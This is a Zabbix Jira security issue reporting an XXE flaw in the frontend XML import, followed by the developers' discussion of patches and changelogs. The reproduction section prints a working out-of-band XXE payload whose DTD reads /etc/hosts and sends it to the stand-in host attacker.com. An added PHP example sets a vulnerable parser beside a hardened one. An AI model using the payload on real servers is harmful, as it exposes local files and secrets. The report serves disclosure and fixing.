[ZBX-8151] Zabbix 1.8.x-2.2.x Local File Inclusion via XXE Attack Created: 2014 Apr 25  Updated: 2020 Jul 16  Resolved: 2014 Jun 26

Status: Closed
Project: ZABBIX BUGS AND ISSUES
Component/s: API (A), Frontend (F)
Affects Version/s: 1.8.19, 1.8.20, 2.0.9, 2.0.10, 2.0.11rc2, 2.0.11, 2.2.2, 2.2.3rc1, 2.2.3rc2, 2.2.3
Fix Version/s: 1.8.21rc1, 2.0.13rc1, 2.2.5rc1, 2.3.2

Type: Defect (Security) Priority: Critical
Reporter: pnig0s Assignee: Unassigned
Resolution: Fixed Votes: 0
Labels: frontend, import, security, vulnerability, xxe
Remaining Estimate: Not Specified
Time Spent: Not Specified
Original Estimate: Not Specified
Environment:

CentOS 6.5 x84


Attachments: File ZBX_8151_2_2_2.patch     JPEG File poc_screenshot_01.jpg     JPEG File poc_screenshot_02.jpg    
Issue Links:
Duplicate

Description

The Zabbix frontend supports an XML data import feature, and the server side uses DOMDocument to parse the XML. DOMDocument also parses external DTDs by default, so an attacker can use a crafted XML file to read arbitrary local files and to send HTTP requests using the Zabbix server as a proxy.

==Reproduction:
ext.dtd placed at http://attacker.com/
<!ENTITY % all
"<!ENTITY % send SYSTEM 'http://attacker.com/?%file;'>"
>
%all;

zabbix.xml to import:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/hosts">
<!ENTITY % dtd SYSTEM "http://attacker.com/ext.dtd">
%dtd;
%send;
]>
<zabbix_export>
</zabbix_export>
After importing zabbix.xml into the Zabbix server, the contents of the hosts file will be sent to attacker.com. The attacker can get the content by checking the website access log. If file:///etc/hosts is used instead of php://filter/read=convert.base64-encode/resource=/etc/hosts, the file content will be printed directly on the web page as an error.

==
This bug was found by pnig0s@Freebuf



Comments
Comment by pnig0s [ 2014 Jun 14 ]

Still no fix release for this?

Comment by Andrejs Čirkovs (Inactive) [ 2014 Jun 16 ]

Can you please provide details about the system hosting Zabbix (OS version, PHP version, libxml version)? It seems that this vulnerability affects only systems that have the DTDLOAD libxml flag set (obsolete Red Hat's, mostly) and cannot be fixed on the Zabbix level (please note that forcing libxml to load external DTDs by default is a major security hole itself).

Comment by Pavels Jelisejevs (Inactive) [ 2014 Jun 16 ]

An update from Andrejs:

UPD: we CAN disable this behaviour by calling http://lv1.php.net/manual/en/function.libxml-disable-entity-loader.php libxml_disable_entity_loader(true); just before simplexml_load_file

Comment by pnig0s [ 2014 Jun 16 ]

Yes, you can use libxml_disable_entity_loader(true); to disable the entity parsing, or just throw an error when you come across a DTD tag. I use Ubuntu 10.04, libxml2.6. The newest version of libxml has fixed this problem, but there are a lot of vulnerable hosts in the wild.
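
The parse-and-harden pair below is an added example written for this page; it is not Zabbix code and not the reporter's PoC. It keeps the report's local-file variant offline (a temp file stands in for /etc/hosts, and there is no out-of-band http://attacker.com channel) and shows the libxml_disable_entity_loader(true) fix discussed in the comments above next to an up-front DOCTYPE rejection. The function names importVulnerable and importHardened are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example, not Zabbix code: one import step parsed the unsafe way this
// report describes, beside a hardened version. Function names are hypothetical.

// Vulnerable: LIBXML_NOENT substitutes entities and LIBXML_DTDLOAD fetches the
// DTD. On the old libxml builds the reporter mentions, DTD loading was on even
// without the flag, so a plain loadXML($xml) behaved the same way.
function importVulnerable(string $xml): string
{
    $dom = new DOMDocument();
    $dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD);
    return $dom->documentElement->textContent;
}

// Hardened: a legitimate zabbix_export never carries a DOCTYPE, so refuse one
// outright; never pass NOENT/DTDLOAD; forbid network fetches with NONET; and on
// PHP < 8.0 (where external entity loading is still on by default) switch the
// entity loader off around the parse, as the comments above suggest.
function importHardened(string $xml): string
{
    if (stripos($xml, '<!DOCTYPE') !== false) {
        throw new InvalidArgumentException('import file must not contain a DTD');
    }
    $restoreLoader = null;
    if (PHP_VERSION_ID < 80000) {
        // Deprecated on PHP 8, where it is unnecessary; returns the previous state.
        $restoreLoader = libxml_disable_entity_loader(true);
    }
    $prevErrors = libxml_use_internal_errors(true);
    try {
        $dom = new DOMDocument();
        if (!$dom->loadXML($xml, LIBXML_NONET)) {
            $err = libxml_get_last_error();
            // Do not echo raw parser errors to the page: the in-band variant in the
            // report leaks file contents exactly that way.
            throw new RuntimeException('invalid XML' . ($err ? ' at line ' . $err->line : ''));
        }
        return $dom->documentElement->textContent;
    } finally {
        libxml_clear_errors();
        libxml_use_internal_errors($prevErrors);
        if ($restoreLoader !== null) {
            libxml_disable_entity_loader($restoreLoader);
        }
    }
}

// Constructed input: a secret written to a temp file stands in for /etc/hosts,
// and the payload uses a plain external general entity instead of the report's
// parameter-entity chain so it needs no attacker-controlled web server.
$secretFile = tempnam(sys_get_temp_dir(), 'zbx');
file_put_contents($secretFile, "SECRET-FROM-DISK\n");

$payload = <<<XML
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE zabbix_export [
  <!ENTITY xxe SYSTEM "file://$secretFile">
]>
<zabbix_export><version>&xxe;</version></zabbix_export>
XML;

// The vulnerable parser resolves &xxe; and returns whatever the file held.
echo "vulnerable: ", trim(importVulnerable($payload)), "\n";

// The hardened parser never reaches libxml: the DOCTYPE check rejects the file.
try {
    importHardened($payload);
} catch (InvalidArgumentException $e) {
    echo "hardened:   rejected (", $e->getMessage(), ")\n";
}

unlink($secretFile);
```

The DOCTYPE check is the part that matters for an import endpoint: the export format has no use for a DTD, so rejecting any document that carries one removes both the local-file and the out-of-band variants without depending on which libxml build or PHP version the host happens to run. The loader switch and LIBXML_NONET are defence in depth for the older hosts the reporter mentions.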

Comment by Andrejs Čirkovs (Inactive) [ 2014 Jun 17 ]

RESOLVED
fixed in development branch svn://svn.zabbix.com/branches/dev/ZBX-8151-18 r46594 for 1.8
fixed in development branch svn://svn.zabbix.com/branches/dev/ZBX-8151-20 r46600 for 2.0+

Comment by Pavels Jelisejevs (Inactive) [ 2014 Jun 18 ]

(1) Please add a comment why the LIBXML_IMPORT_FLAGS constant is required. Otherwise good.

andrewtch CLOSED

Comment by Pavels Jelisejevs (Inactive) [ 2014 Jun 18 ]

TESTED.

Please take care of (1) before merging.

Comment by Andrejs Čirkovs (Inactive) [ 2014 Jun 18 ]

Waiting for 2.2 to unfreeze before merge (as for June 18 2014).

Comment by Ingus Vilnis [ 2014 Jun 20 ]

(2) Please create a patch for customer using 2.2.2 frontend.

andrewtch please see https://support.zabbix.com/secure/attachment/28912/ZBX_8151_2_2_2.patch attached, apply with:

patch -p0 -i ZBX_8151_2_2_2.patch

from Zabbix root. Should also work on other 2.0 / 2.2 branches.

RESOLVED.

ingus.vilnis CLOSED. May be reopened because the customer has not confirmed the patch yet (as of June 26).

Comment by Andrejs Čirkovs (Inactive) [ 2014 Jun 20 ]

Patch for 2.2.2 (should work on any 2.0 / 2.2).

Comment by Andrejs Čirkovs (Inactive) [ 2014 Jun 25 ]

Closed in pre-1.8.21rc1 r46795, pre-2.0.13rc1 r46796, pre-2.2.5rc1 r46797, pre-2.3.2 r46799.

Comment by richlv [ 2014 Jun 25 ]

subissues (1) and (2) still not closed

Comment by richlv [ 2014 Jun 25 ]

(3) changelog entry only has F component marked - didn't this fix affect the api in some way, too ? (configuration.import or anything else)

andrewtch RESOLVED, corrected changelogs

richlv note that more recent changelogs have sections for older releases - apparently those have not been updated

andrewtch Must be fixed by now

<richlv> thanks, looks good to me -> CLOSED

Comment by richlv [ 2014 Jun 25 ]

(4) it's a common practice to mention reporters for security issues - in this case let's add in the changelog entry "; thanks to pnig0s@Freebuf for the report"

andrewtch RESOLVED, updated changelogs

richlv note that more recent changelogs have sections for older releases - apparently those have not been updated

andrewtch Must be fixed by now

<richlv> thanks, looks good to me -> CLOSED

Generated at Thu Apr 25 03:19:58 EEST 2024 using Jira 9.12.4#9120004-sha1:625303b708afdb767e17cb2838290c41888e9ff0.